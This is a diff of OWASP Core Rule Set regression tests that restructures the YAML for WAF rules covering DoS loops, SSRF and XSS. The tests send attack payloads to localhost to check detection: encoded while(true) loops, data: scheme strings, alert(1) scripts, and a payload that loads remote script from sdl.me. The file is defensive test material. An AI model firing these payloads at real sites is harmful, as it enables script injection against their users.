version: HTTP/1.1 + output: + log_contains: id "934160" + - test_id: 30 desc: "Detect example DoS loop while(true) submitted as plaintext with JavaScript escape sequence obfuscation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?eval=\u0077\u0068ile(true);" - version: HTTP/1.1 - output: - log_contains: id "934160" - - test_title: 934160-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?eval=while(true);" + version: HTTP/1.1 + output: + log_contains: id "934160" + - test_id: 31 desc: "Detect example DoS loop while(true) submitted as plaintext that has been Base64 encoded" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?eval=d2hpbGUodHJ1ZSk7Cg%3D%3D" - version: HTTP/1.1 - output: - log_contains: id "934160" - - test_title: 934160-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?eval=d2hpbGUodHJ1ZSk7Cg%3D%3D" + version: HTTP/1.1 + output: + log_contains: id "934160" + - test_id: 32 desc: "Detect example DoS loop while(true) submitted as plaintext with JavaScript escape sequence obfuscation that has been Base64 encoded" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?eval=XHUwMDc3XHUwMDY4aWxlKHRydWUpOwo%3D" - version: HTTP/1.1 - output: - log_contains: id "934160" - - test_title: 934160-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?eval=XHUwMDc3XHUwMDY4aWxlKHRydWUpOwo%3D" + version: HTTP/1.1 + output: + log_contains: id "934160" + - test_id: 33 desc: "Detect example DoS loop while(true) submitted as plaintext that has been Base64 encoded and then obfuscated with JavaScript escape sequences" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?eval=\u0064\u0032hpbGUodHJ1ZSk7Cg%3D%3D" - version: HTTP/1.1 - output: - log_contains: id "934160" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?eval=d2hpbGUodHJ1ZSk7Cg%3D%3D" + version: HTTP/1.1 + output: + log_contains: id "934160" diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml index 9d3111052..8348a8bb9 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml @@ -1,61 +1,57 @@ --- meta: author: "fzipi, azurit" - enabled: true - name: "934170.yaml" description: "Tests for rule 934170 - PHP data scheme support" +rule_id: 934170 tests: - - test_title: 934170-1 + - test_id: 1 desc: "SSRF - data: scheme test - IN2OZO3N coverage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=data:text/plain;base64,SSBsb3ZlIFBIUAo=" - version: "HTTP/1.1" - output: - log_contains: id "934170" - - test_title: 934170-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=data:text/plain;base64,SSBsb3ZlIFBIUAo=" + version: "HTTP/1.1" + output: + log_contains: id "934170" + - test_id: 2 desc: "Negative test - data:// should not match" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=data://text/plain;base64,SSBsb3ZlIFBIUAo=" - version: "HTTP/1.1" - output: - no_log_contains: id "934170" - - test_title: 934170-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=data://text/plain;base64,SSBsb3ZlIFBIUAo=" + version: "HTTP/1.1" + output: + no_log_contains: id "934170" + - test_id: 3 desc: "Status Page Test - SSRF - data: scheme test - simple trigger, isolated test" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=data:text/plain" - version: "HTTP/1.1" - output: - log_contains: id "934170" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=data:text/plain" + version: "HTTP/1.1" + output: + log_contains: id "934170" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml index e2f420869..a198c9b50 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml @@ -1,107 +1,99 @@ --- meta: author: "csanders-git, Walter Hop, azurit" - enabled: true - name: "941100.yaml" description: "Tests to trigger, or not trigger 941100" +rule_id: 941100 tests: - - test_title: 941100-1 + - test_id: 1 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941100" - - test_title: 941100-2 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "941100" + - test_id: 2 desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941100" - - test_title: 941100-3 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "941100" + - test_id: 3 desc: XSS testing of libinjection in User-Agent stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: '/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E' - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941100" - - test_title: 941100-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + User-Agent: '/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E' + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "941100" + - test_id: 4 desc: XSS testing of libinjection in User-Agent stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: "OWASP CRS test agent" - Referer: http://www.coreruleset.org - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: id "941100" - - test_title: 941100-5 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + User-Agent: "OWASP CRS test agent" + Referer: http://www.coreruleset.org + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: id "941100" + - test_id: 5 desc: XSS testing of libinjection in User-Agent stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: "OWASP CRS test agent" - Referer: '/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: id "941100" - - test_title: 941100-6 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + User-Agent: "OWASP CRS test agent" + Referer: '/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: id "941100" + - test_id: 6 desc: Status Page Test - simplified XSS testing of libinjection in ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: - foo= - version: "HTTP/1.1" - output: - log_contains: id "941100" + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: foo= + version: "HTTP/1.1" + output: + log_contains: id "941100" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml index fb0718523..7b42a9758 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml @@ -1,54 +1,50 @@ --- meta: author: "4v3r9, Walter Hop, azurit" - enabled: true - name: "941101.yaml" description: "Test to trigger 941101" +rule_id: 941101 tests: - - test_title: 941101-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Referer: www.github.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-2 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: xyz= + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "941110" + - test_id: 2 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get?x=alert(1);" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-3 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get?x=alert(1);" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "941110" + - test_id: 3 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: "<script+>alert(1);</script>=value" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + User-Agent: "<script+>alert(1);</script>=value" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "941110" + - test_id: 4 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Referer: "" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-5 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Referer: "" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "941110" + - test_id: 5 desc: XSS in URI / PATH_INFO going undetected - GH issue 1022 stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/foo/bar%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E/" - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-6 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/foo/bar%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E/" + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + version: "HTTP/1.1" + output: + log_contains: id "941110" + - test_id: 6 desc: XSS in payload using %uNNNN stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/get" - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - data: | - var=%uff1cscript%u0020%uff1ealert%281%29%uff1c/script%uff1e - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-7 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/get" + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + data: | + var=%uff1cscript%u0020%uff1ealert%281%29%uff1c/script%uff1e + version: "HTTP/1.1" + output: + log_contains: id "941110" + - test_id: 7 desc: XSS in payload with individual code points urlencoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/get" - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - data: | - var=%ef%bc%9cscript%20%ef%bc%9ealert%281%29%ef%bc%9c/script%ef%bc%9e - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-8 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/get" + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + data: | + var=%ef%bc%9cscript%20%ef%bc%9ealert%281%29%ef%bc%9c/script%ef%bc%9e + version: "HTTP/1.1" + output: + log_contains: id "941110" + - test_id: 8 desc: XSS in cookie name using unicode stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - Cookie: <script >alert(1)</script>=value - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-9 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + Cookie: <script >alert(1)</script>=value + version: "HTTP/1.1" + output: + log_contains: id "941110" + - test_id: 9 desc: XSS in Referer using html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Referer: "<script+>alert(1);</script>" - User-Agent: "OWASP CRS test agent" - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-10 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Referer: "<script+>alert(1);</script>" + User-Agent: "OWASP CRS test agent" + version: "HTTP/1.1" + output: + log_contains: id "941110" + - test_id: 10 desc: GH issue 1481 stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get?%9cscript+%bcalert(1);%bc/script%9e=value" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: id "941110" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get?%9cscript+%bcalert(1);%bc/script%9e=value" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: id "941110" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml index 3a705d494..d5d2580c7 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml @@ -2,103 +2,95 @@ meta: author: "Christian S.J. Peron, Walter Hop, azurit" description: None - enabled: true - name: 941120.yaml tests: - - test_title: 941120-1 + - test_id: 1 desc: "XSS Filter - Category 2: Event Handler Vector" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?%20%20onload%3d%20=vardata" - version: HTTP/1.0 - output: - log_contains: id "941120" - - test_title: 941120-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?%20%20onload%3d%20=vardata" + version: HTTP/1.0 + output: + log_contains: id "941120" + - test_id: 2 desc: "XSS Filter - Category 2: Event Handler Vector" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?%20%20onabcdefgh%3d%20=vardata" - version: HTTP/1.0 - output: - log_contains: id "941120" - - test_title: 941120-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?%20%20onabcdefgh%3d%20=vardata" + version: HTTP/1.0 + output: + log_contains: id "941120" + - test_id: 3 desc: "XSS Filter - Category 2: Event Handler Vector" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?%20%20onab%3d%20=vardata" - version: HTTP/1.0 - output: - no_log_contains: id "941120" - - test_title: 941120-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?%20%20onab%3d%20=vardata" + version: HTTP/1.0 + output: + no_log_contains: id "941120" + - test_id: 4 desc: "XSS Filter - Category 2: Event Handler Vector" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?%20%20onabcdefghijklmnopqrstuvwxyz%3d%20=vardata" - version: HTTP/1.0 - output: - no_log_contains: id "941120" - - test_title: 941120-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?%20%20onabcdefghijklmnopqrstuvwxyz%3d%20=vardata" + version: HTTP/1.0 + output: + no_log_contains: id "941120" + - test_id: 5 desc: "XSS Filter - Category 2: Event Handler Vector" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Cookie: 'FCNEC=[["AKsRol96Mxyk9FqhFojBc6fQqh-bo-s0VYkniISe0wOz3NRAr90HMsu ZQ81FJitWrfPRF09u-aYlhT0PMzLHW-cwgE2c_bmkaerz5Ht3N2y-Tseg5C_ngXVXK2eHiHVfBdx8iAtcRpqNdws_RZwZarM8E0ONvOztHg=="]]' - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "941120" - - test_title: 941120-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Cookie: 'FCNEC=[["AKsRol96Mxyk9FqhFojBc6fQqh-bo-s0VYkniISe0wOz3NRAr90HMsu ZQ81FJitWrfPRF09u-aYlhT0PMzLHW-cwgE2c_bmkaerz5Ht3N2y-Tseg5C_ngXVXK2eHiHVfBdx8iAtcRpqNdws_RZwZarM8E0ONvOztHg=="]]' + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: id "941120" + - test_id: 6 desc: "SVG onload injection in filename" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php/%3Csvg/onload=alert()" - version: HTTP/1.0 - output: - log_contains: id "941120" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php/%3Csvg/onload=alert()" + version: HTTP/1.0 + output: + log_contains: id "941120" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml index 4a8eb1bf2..a856409c0 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml @@ -2,326 +2,306 @@ meta: author: "csanders-git, Christian Folini, azurit" description: "Tests to trigger, or not trigger 941130" - enabled: true - name: 941130.yaml +rule_id: 941130 tests: - - test_title: 941130-1 + - test_id: 1 desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E" - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941130" - - test_title: 941130-2 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E" + headers: + Host: localhost + 